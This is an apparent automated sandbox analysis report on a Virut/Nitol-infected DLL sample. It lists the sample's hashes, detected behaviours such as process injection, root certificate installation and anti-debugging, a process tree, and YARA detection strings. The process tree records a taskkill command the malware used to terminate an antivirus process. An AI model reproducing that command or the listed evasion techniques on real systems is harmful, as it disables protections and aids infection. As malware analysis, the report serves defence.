Edit tour

Windows Analysis Report
26B1sczZ88.dll

Overview

General Information

Sample name:	26B1sczZ88.dll renamed because original name is a hash value
Original sample name:	6aff1202f53fe4cc6282f9ad3ebdef95bb4cf49f.dll
Analysis ID:	1578325
MD5:	51ac05b8af0e9e0a2180f230588e795f
SHA1:	6aff1202f53fe4cc6282f9ad3ebdef95bb4cf49f
SHA256:	68f9c7084a93f5b0487210704343acb69339b5bd16921cf1dae0c20966911df0
Tags:	dlluser-NDA0E
Infos:

Detection

Virut

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Virut

AI detected suspicious sample

Changes memory attributes in foreign processes to executable or writable

Contains functionality to detect sleep reduction / modifications

Creates a thread in another existing process (thread injection)

Creates files in the system32 config directory

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Found evasive API chain (may stop execution after checking volume information)

Injects code into the Windows Explorer (explorer.exe)

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Tries to evade debugger and weak emulator (self modifying code)

Tries to resolve many domain names, but no domain seems valid

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May check if the current machine is a sandbox (GetTickCount - Sleep)

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara signature match

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4944 cmdline: loaddll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6944 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 5656 cmdline: rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

hrl97AF.tmp (PID: 3388 cmdline: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp MD5: F3F920AAF85289A8E532890BC618AADD)

winlogon.exe (PID: 584 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

svchost.exe (PID: 752 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 1336 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1348 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1640 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1680 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

rundll32.exe (PID: 7000 cmdline: rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDllInitialize MD5: 889B99C52A60DD49227C5E485A016679)

hrl97BF.tmp (PID: 5732 cmdline: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp MD5: F3F920AAF85289A8E532890BC618AADD)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

svchost.exe (PID: 880 cmdline: C:\Windows\system32\svchost.exe -k RPCSS -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 792 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1028 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1036 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1160 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

rundll32.exe (PID: 5664 cmdline: rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDrawTextEx MD5: 889B99C52A60DD49227C5E485A016679)

hrlA367.tmp (PID: 3916 cmdline: C:\Users\user\AppData\Local\Temp\hrlA367.tmp MD5: F3F920AAF85289A8E532890BC618AADD)

svchost.exe (PID: 1124 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1220 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1584 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1800 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

rundll32.exe (PID: 6012 cmdline: rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkEditControl MD5: 889B99C52A60DD49227C5E485A016679)

hrlAF3E.tmp (PID: 6016 cmdline: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp MD5: F3F920AAF85289A8E532890BC618AADD)

taskkill.exe (PID: 1812 cmdline: taskkill /f /im ZhuDongFangYu.exe /t MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

zvhcfa.exe (PID: 800 cmdline: C:\Windows\SysWOW64\zvhcfa.exe MD5: F3F920AAF85289A8E532890BC618AADD)

svchost.exe (PID: 1504 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1656 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1836 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Virut		No Attribution	https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/ https://chrisdietri.ch/post/virut-resurrects/ https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/ https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/ https://www.mandiant.com/resources/pe-file-infecting-malware-ot	https://malpedia.caad.fkie.fraunhofer.de/details/win.virut

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
26B1sczZ88.dll	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x8f7f:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
26B1sczZ88.dll	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x71b4:$xc2: GET ^&&%$%$^ 0x71e5:$xc2: GET ^&&%$%$^ 0x7216:$xc2: GET ^&&%$%$^ 0x7247:$xc2: GET ^&&%$%$^ 0x7278:$xc2: GET ^&&%$%$^ 0x72a9:$xc2: GET ^&&%$%$^ 0x72da:$xc2: GET ^&&%$%$^ 0x730b:$xc2: GET ^&&%$%$^ 0x733c:$xc2: GET ^&&%$%$^ 0x736d:$xc2: GET ^&&%$%$^ 0x739e:$xc2: GET ^&&%$%$^ 0x73cf:$xc2: GET ^&&%$%$^ 0x7400:$xc2: GET ^&&%$%$^ 0x7431:$xc2: GET ^&&%$%$^ 0x7462:$xc2: GET ^&&%$%$^ 0x7493:$xc2: GET ^&&%$%$^ 0x74c4:$xc2: GET ^&&%$%$^ 0x74f5:$xc2: GET ^&&%$%$^ 0x7526:$xc2: GET ^&&%$%$^ 0x7557:$xc2: GET ^&&%$%$^ 0x71e1:$n1: .htmGET

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
C:\Users\user\AppData\Local\Temp\hrlA367.tmp	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
C:\Users\user\AppData\Local\Temp\hrlA367.tmp	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
C:\Windows\SysWOW64\zvhcfa.exe	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
C:\Windows\SysWOW64\zvhcfa.exe	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000026.00000002.2743535164.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001B.00000002.2741797049.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000025.00000002.2743367209.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000018.00000002.2743542686.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000C.00000002.2798846486.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000012.00000002.2742331815.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001F.00000002.2744487406.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000023.00000002.2743363395.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000024.00000002.2743906496.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000013.00000000.1516357060.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000026.00000002.2742839099.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001A.00000002.2744241055.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001D.00000002.2741751352.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000D.00000002.2743908241.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.2017093698.000000007FE40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000016.00000000.1519926327.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000B.00000002.2798955144.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000027.00000002.2742966295.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000024.00000002.2742677643.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000029.00000002.2745114770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000009.00000002.2742603638.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000009.00000002.2743903996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000007.00000002.2043911687.000000007FE20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000027.00000002.2743612981.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000028.00000002.2744408295.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000010.00000002.2743736063.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000019.00000000.1537557780.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.2017013687.000000007FE20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000012.00000000.1514452533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000016.00000002.2743037216.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000012.00000002.2742840917.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000F.00000002.2798456887.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000010.00000002.2743087540.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001F.00000000.1550287003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000000.1512389471.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000019.00000002.2742759300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000D.00000000.1498055145.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000008.00000002.2741922410.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000002A.00000002.2741956104.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000009.00000000.1491890758.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000025.00000002.2741930750.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000010.00000000.1509606581.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000013.00000002.2743461282.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001B.00000002.2742552059.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000017.00000000.1522184005.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000A.00000002.2741922176.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000B.00000000.1495302635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001A.00000000.1542306261.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001F.00000002.2742576822.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000F.00000002.2798241222.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000C.00000000.1496798093.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000D.00000002.2742703107.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000023.00000002.2742760458.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000E.00000002.2742198516.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000013.00000002.2744126681.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000029.00000000.1572545222.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000015.00000002.2066888535.000000007FE40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000029.00000002.2743852596.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000028.00000002.2743091000.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000F.00000000.1509586132.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000017.00000002.2742914219.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000E.00000002.2741867843.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000007.00000002.2043996617.000000007FE40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000008.00000000.1491843448.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000C.00000002.2798238281.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000B.00000002.2798310722.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000018.00000002.2744224357.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000008.00000002.2741748612.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000017.00000002.2742335064.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000002A.00000002.2742967559.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000018.00000000.1525893859.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
